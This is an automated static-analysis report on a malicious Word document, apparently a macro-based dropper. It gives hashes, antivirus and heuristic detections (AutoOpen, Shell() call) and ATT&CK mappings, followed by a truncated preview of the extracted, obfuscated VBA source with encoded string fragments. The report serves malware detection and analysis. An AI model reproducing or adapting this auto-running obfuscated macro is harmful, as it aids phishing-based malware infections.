Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1982ddb55fa50ff3…

MALICIOUS

Office (OLE)

Size: 175.5 KB
Created: 2018-05-18 07:36:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: 3770b2bf0f5d19773929c8d87de760e7
SHA-1: 5388afd4e5596eff65061cff6ffa6387e25a4818
SHA-256: 1982ddb55fa50ff35eb67c5bc9fb101b6b755ffae8046c6c5a8cb9fa66b22662
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' heuristic indicates the presence of a Shell() call, which is commonly used to execute arbitrary code. The 'Autoopen' macro suggests it runs automatically upon opening. This points to a macro-based downloader, a common initial access vector via spearphishing attachments.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6548036-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6548036-0
  • VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 177069 bytes
SHA-256: 360397ed8e5e6270af2c8299f8a4e24615b9ce10440a50e55b0a528f07604bb1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "YcKPrfKnjSjcuA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HjCpGw(OIPJzo)
For witBwh = 28830 To 70407
      For jXdjUj = 93894 To TuakB
         zUBtrE = ChrB(GNjVi)
      Next
      LcREfW = 11636 * 35795
      dPGiL = qFNKzB + juoXfV
Next
End Sub
Sub JuKqjl(BpvOvO)
For rlmJtO = 30734 To 16563
      For LjzPv = 43325 To HqkpJ
         FQBazo = ChrB(SwCmR)
      Next
      JBOmHN = 1482 * 47578
      JjWwfY = XKZVIj + ISObs
Next
For PiLzG = 25985 To 29547
      For DccIKF = 13370 To EAJqi
         rNvjc = ChrB(GUtlHV)
      Next
      iXYsRJ = 88580 * 38357
      wNwaPp = NRCYq + wBZlkn
Next
For jqAoWc = 89222 To 60662
      For rhkEJ = 31143 To iBPQFf
         FzsrZ = ChrB(TjYGk)
      Next
      GMJEnv = 67468 * 10370
      UomdiS = jVXiDW + rdkVIo
Next
End Sub
Sub IiUKK(ZwbUW)
For tlIGNr = 7459 To 55196
      For DiFujR = 34074 To CaaQOM
         SSYwR = ChrB(tDHddJ)
      Next
      WXdEMO = 10465 * 90831
      QaEHU = uvJiZ + ouTHLJ
Next
For fzQFI = 67378 To 9960
      For wVEAGO = 7633 To zsJSU
         LUwkj = ChrB(cKzAFw)
      Next
      QzUwY = 29979 * 87853
      aFiSjk = VOBqoW + wHXzWD
Next
End Sub
Sub Autoopen()
On Error Resume Next
For XDuKzn = 4819 To 54766
      For kCbLlO = 38972 To zwjpj
         OHsiDN = ChrB(ZsqLC)
      Next
      jIkwp = 87020 * 34963
      nNLAh = FzYTwo + fCGIz
Next
DEVMaPww (XLKkz + wSOmNvlcJ + NkJPBt)
For Rhbuhi = 40791 To 50726
      For aUXPO = 93540 To Fdnqi
         FdcLRU = ChrB(vkWZA)
      Next
      XEHZi = 57901 * 78132
      lpNkU = hElND + WbzSW
Next
End Sub
Sub AXXqw(OqZwwE)
For MppUo = 29895 To 50768
      For EVrwIV = 67509 To vHpDR
         QhvrOW = ChrB(riGjEq)
      Next
      hHJCvQ = 91792 * 5186
      rpcfpd = IBriYH + zADSN
Next
For lRDiHT = 76736 To 95534
      For HBiNBD = 2736 To roNqzf
         IDZiM = ChrB(rziPv)
      Next
      mzYWp = 88691 * 42383
      qALGVv = MdAwn + qWEuFl
Next
For PDzwGd = 29633 To 77289
      For SXwbl = 44537 To sSMQm
         UiSHnv = ChrB(UckIlf)
      Next
      AMArja = 86972 * 22492
      AMBTPM = sUwjjR + wqTNzq
Next
End Sub
Sub nqFkGf(VkLmI)
For SvmcL = 15466 To 1761
      For onvDjh = 2605 To MNuVp
         VviIj = ChrB(Xkmzb)
      Next
      MDErB = 82950 * 79049
      zDKhXw = UXwsm + FZqtD
Next
End Sub

Attribute VB_Name = "sUDAzcXUzwU"
Sub CjuNS(BkirCM)
For FovHdN = 96165 To 95850
      For wavCM = 9795 To dTXDmp
         WsHFs = ChrB(sASrM)
      Next
      ncNUjW = 27826 * 75217
      TRPYwl = XfJBP + ZOWHFf
Next
End Sub
Function wSOmNvlcJ()
On Error Resume Next
For vIEpT = 33266 To 44912
      For zojXC = 43001 To arhvh
         cniLcF = ChrB(wzbQj)
      Next
      nLNaE = 59847 * 26764
      YrdiNL = ofZKw + SVViqL
Next
For HabIto = 22587 To 10192
      For VsdMFI = 49816 To UKkNj
         zjZGL = ChrB(vcwwB)
      Next
      jjAcaK = 60980 * 42416
      mwBLq = nNwjPa + dZTiA
Next
TznmHKPbLv = ujOXQ("dQW+'.)8ec}8ec+8ec}{h'+'c8ec+8ectac8ec+8ec};8ec+8eckaerb;8ec+8ec)CDSb8ec+8ec'+'cq()'+'QuAmetI8ec+8ec-eQ8ec+8ecuA+QuAkQuA+Qu'+'AovnIQu8ec+8ecA(8ec+8ec&8ec+8ec;)CDSbcq8ec+8ec ,)(8ec+8ecqAT8ec+8ecg8ec+B,,T", 8674 + 5 - 8674, 8674 + 195 - 8674)
For sttjKX = 53838 To 81558
      For skahK = 61945 To mYuUi
         PAQmH = ChrB(FbIrJ)
      Next
      ditQqn = 28109 * 71219
      UNGiPq = mvnfV + isQYQS
Next
For KTUXJ = 57089 To 71098
      For zXEhh = 32125 To szzvCL
         iDptm = ChrB(twvPkm)
      Next
      lmzQW = 24315 * 35591
      ShJGl = iRmOp + vpQhP
Next
pjQoWwslDR = ujOXQ("ffC8ecN68ec+8eciyi6iy8ec+8ecrtS8ec+8ecoTqA8ec+8ecT.cfsabc8ec+8ec'+'bRGh", 70229 + 5 - 70229, 70229 + 64 - 70229)
For ziAbpz = 90357 To 83381
      For FAhYq = 87105 To MVjnBR
         hJAua = ChrB(wWPAfN)
      Next
      VqsLLt = 18831 * 48285
      FqzSE = uBco
... (truncated)